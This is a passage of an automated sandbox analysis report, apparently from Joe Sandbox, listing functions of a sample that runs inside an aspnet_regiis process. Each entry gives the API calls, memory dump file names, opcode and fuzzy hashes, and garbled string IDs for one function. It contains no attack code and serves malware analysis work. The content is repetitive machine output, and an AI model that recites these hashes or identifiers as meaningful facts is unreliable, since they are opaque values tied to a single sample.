                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000002), ref: 0072EF57
                                                                                                                                                                                                                                              • CoInitializeEx.COMBASE(00000000,00000002), ref: 0072F09C
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Initialize
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2538663250-0
                                                                                                                                                                                                                                              • Opcode ID: 8e18e80e202ed01620de1325316161bd89d0f4138e16c5c4f5039a8e62b48535
                                                                                                                                                                                                                                              • Instruction ID: 9f3e702e6b9bb2da970e748bc6d3a6f89c45b712520b8e46a37b70a14896a07f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e18e80e202ed01620de1325316161bd89d0f4138e16c5c4f5039a8e62b48535
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A41C7B4910B40AFD370EF39DA0B7137EB8AB05250F508B1DF9E6866D4E235A4198BD7
                                                                                                                                                                                                                                              Function 0072EC77 Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0072EC89
                                                                                                                                                                                                                                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0072ECA2
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeSecurity
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 640775948-0
                                                                                                                                                                                                                                              • Opcode ID: 0fa45b97284c351b8f3da443927dcae05ff1650f17fac1bf5e572d427dc1a2d0
                                                                                                                                                                                                                                              • Instruction ID: 31d9e94037d624247d3c91463fcbb457effc0b98ad05209988913f7ce305f2ec
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0fa45b97284c351b8f3da443927dcae05ff1650f17fac1bf5e572d427dc1a2d0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5EE024743D9341BAF6B98714ED67F143226AB46F26F308304F72A7DBE58AE83201851D
                                                                                                                                                                                                                                              Function 00757764 Relevance: 1.6, APIs: 1, Instructions: 90COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetUserDefaultUILanguage.KERNELBASE ref: 0075779D
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DefaultLanguageUser
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 95929093-0
                                                                                                                                                                                                                                              • Opcode ID: 064146c5b12ea53e323e42fd1c69a3bca6c122e26c53a4883e64df6a7a80c121
                                                                                                                                                                                                                                              • Instruction ID: 516b5261599080ef91dd38355418583852aad51b38fbb3a97913da791d3a5148
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 064146c5b12ea53e323e42fd1c69a3bca6c122e26c53a4883e64df6a7a80c121
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA31F532B466408FD719CA78DC877ADBBE28B95314F0E80A9D459C7392D93C8946CB20
                                                                                                                                                                                                                                              Function 0074D7BD Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0074DD03
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ComputerName
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3545744682-0
                                                                                                                                                                                                                                              • Opcode ID: 844e4ee2c1cebddf3b64bfc166a1cbc32418a8f5b366de2336d88c77af214129
                                                                                                                                                                                                                                              • Instruction ID: 95e2a4bdac6c2bf4273b86e25d24c59e028e53cbbb088e9ea5dec5ffc8316dff
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 844e4ee2c1cebddf3b64bfc166a1cbc32418a8f5b366de2336d88c77af214129
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D2192706047918FD7368F24C4A0722BBE1BF5B304B18968DD4D38B686CB78A845D762
                                                                                                                                                                                                                                              Function 0074DC76 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0074DD03
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ComputerName
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3545744682-0
                                                                                                                                                                                                                                              • Opcode ID: c971f70d50a72bb8878e37de8d760980d13a3e40acb5dc099fbd88e40543ec23
                                                                                                                                                                                                                                              • Instruction ID: 074672eefc2018d896878be0b8857c50ab5d7314797b3cd25d42dc320cdaeef0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c971f70d50a72bb8878e37de8d760980d13a3e40acb5dc099fbd88e40543ec23
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C411C4B06047918FD7258F24C8A0722BBA2BF4A300B1CC69DD493CB382CB78D841D761
                                                                                                                                                                                                                                              Function 0075E0A0 Relevance: 1.5, APIs: 1, Instructions: 31memoryCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlReAllocateHeap.NTDLL(?,00000000), ref: 0075E0E0
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                              • Opcode ID: c5e69d2717bf3a6c40c624759394bc02e969ea4bd00864118afa48317c0ba153
                                                                                                                                                                                                                                              • Instruction ID: 39866f9532d12aea160756a353dd5d283dc55f689d26ab258707d52a727fb1a1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5e69d2717bf3a6c40c624759394bc02e969ea4bd00864118afa48317c0ba153
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1FF0A731814312FBC2112F247D05A9736A8EFC2711F154435F81597151EBBCE81AC595
                                                                                                                                                                                                                                              Function 0075E3A9 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 0075E3BA
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ForegroundWindow
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2020703349-0
                                                                                                                                                                                                                                              • Opcode ID: 01c482c241b7cdd7a95c6bd86a7a6964ad074306b69560ae2f3bd47159f8cc3e
                                                                                                                                                                                                                                              • Instruction ID: c132d87eb843269fefe6e23a3adb1e1a87a35af0a1f0c7cf9109eb1cf0831ac1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 01c482c241b7cdd7a95c6bd86a7a6964ad074306b69560ae2f3bd47159f8cc3e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 96F0A0FEE802128FDB04CF55EC5446533A7B7D831631DC469D906E3225DFB8A902CA45
                                                                                                                                                                                                                                              Function 00750B2B Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: BlanketProxy
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3890896728-0
                                                                                                                                                                                                                                              • Opcode ID: 69ce51d5c8a9048290e3aebfbd145426df6b65b725838c4c4bd45af6b4686503
                                                                                                                                                                                                                                              • Instruction ID: e1b513b3575283d5579bc9a341b46a44cdfadf2bf656882281efd1f04feee4d0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 69ce51d5c8a9048290e3aebfbd145426df6b65b725838c4c4bd45af6b4686503
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83F0D0B4109701CFD344DF24D1A471A7BF0FB88304F10884CE4968B390CBB59A48CF82
                                                                                                                                                                                                                                              Function 007528EB Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: BlanketProxy
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3890896728-0
                                                                                                                                                                                                                                              • Opcode ID: f51346924ac60e10f50912aab23df92b5d0204b9e5b5e7bd0d306c73ec0eb300
                                                                                                                                                                                                                                              • Instruction ID: 5e69d0311e21463659b75ea954a2eb6defac423df520df51ba28c35b5e0ff2c7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f51346924ac60e10f50912aab23df92b5d0204b9e5b5e7bd0d306c73ec0eb300
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94F07AB46083418FD354DF24C5A871BBBE1BB84308F00891DE5998B390C7B99549CF82
                                                                                                                                                                                                                                              Function 0075C570 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(?,00000000,?,0075E0F9), ref: 0075C590
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                                                                                                                              • Opcode ID: 3c04567bd0cf67e4d7749d0d10093b4eb0c32bebe01c52ddc0d032aa0919d6f2
                                                                                                                                                                                                                                              • Instruction ID: e1d7300dddcbe3817bc64cfe83a5b472ce7746454fc69740a432f6e034ca7d65
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c04567bd0cf67e4d7749d0d10093b4eb0c32bebe01c52ddc0d032aa0919d6f2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 16D0C931419622EBC6102F28BC05BC73A589F49261F074891F514AA075C768EC91CAD4
                                                                                                                                                                                                                                              Function 0075C55B Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(?,00000000), ref: 0075C561
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                              • Opcode ID: 07d305e164c468bae7233e61bc0fa627ed2f31fcb98255365c183bb90e10b0b6
                                                                                                                                                                                                                                              • Instruction ID: a61c0fe4462f4c3f3130554de00ab9e53d8cad2078091387f7b1ae4b30738dfe
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 07d305e164c468bae7233e61bc0fa627ed2f31fcb98255365c183bb90e10b0b6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35A01130080020AACA222B20BC08FC23E20EB082A0F028082F008880B282208882CA88

                                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                                              Function 0073C8A0 Relevance: 15.6, Strings: 12, Instructions: 585COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: "nl$#M%O$*"$4UW$\701$\701$a`|v$wt$AC$MO$pv$uvw
                                                                                                                                                                                                                                              • API String ID: 0-635595044
                                                                                                                                                                                                                                              • Opcode ID: 8d0eada960b9db452e1f7c613afe6bb361832d3c66aa10a4c7bc8ef8d49488e3
                                                                                                                                                                                                                                              • Instruction ID: cfb1669cf9fe6350db283f9f18fb04f36beec9cb7fa2ae67b35f9cdb020ad4c6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8d0eada960b9db452e1f7c613afe6bb361832d3c66aa10a4c7bc8ef8d49488e3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5B02E1B660C3108BD7049F68D89166BBBF1EFD1314F198D2CF4C59B352D2389A09CB96
                                                                                                                                                                                                                                              Function 007481CC Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 593COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 007484BD
                                                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 007485B4
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                              • String ID: LF7Y$_^]\
                                                                                                                                                                                                                                              • API String ID: 237503144-3688711800
                                                                                                                                                                                                                                              • Opcode ID: c004d96c4db9a570eea45fbe0ab0a058a62d31ea0a4cacf2709fdcbc8f1b0cd8
                                                                                                                                                                                                                                              • Instruction ID: 50bab94249a2c7deba0492f9d84e208e140d78f843599886f2932b35d39519ad
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c004d96c4db9a570eea45fbe0ab0a058a62d31ea0a4cacf2709fdcbc8f1b0cd8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A22017190C341CFD3288F28D89072FBBE1BF89314F198A6CE996573A1D7799901CB96
                                                                                                                                                                                                                                              Function 007491AE Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 186COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?), ref: 007491DA
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                              • String ID: +Ku$wpq
                                                                                                                                                                                                                                              • API String ID: 237503144-1953850642
                                                                                                                                                                                                                                              • Opcode ID: c5b79acac20e03018182141dd697ab7eb35b0c1a1d9bd173a5fc300b31f22832
                                                                                                                                                                                                                                              • Instruction ID: 3a6ad0a8d4c42a4e3c0dfee4010065fa74ef4bcf7f0afeb1f26e68f0bba72e29
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5b79acac20e03018182141dd697ab7eb35b0c1a1d9bd173a5fc300b31f22832
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9551CD7221C3568FC324CF29984076FB7E2EBC5310F55892DE5AACB285DB74D50ACB92
                                                                                                                                                                                                                                              Function 007548C2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: MetricsSystem
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                              • Opcode ID: 5e22f55dd2d02b173c4ee3805dfe6e793218203c8dfd80e8549f64f4a3385080
                                                                                                                                                                                                                                              • Instruction ID: 119348dfc34023e70e1d664dec28341a2d5679c09c5ceb32f5937b540e4405e5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e22f55dd2d02b173c4ee3805dfe6e793218203c8dfd80e8549f64f4a3385080
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C5161B0E152089FDB40EFACD98569DBBF0BB48310F10852EE899E7350D774A944CF96
                                                                                                                                                                                                                                              Function 007490D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00749170
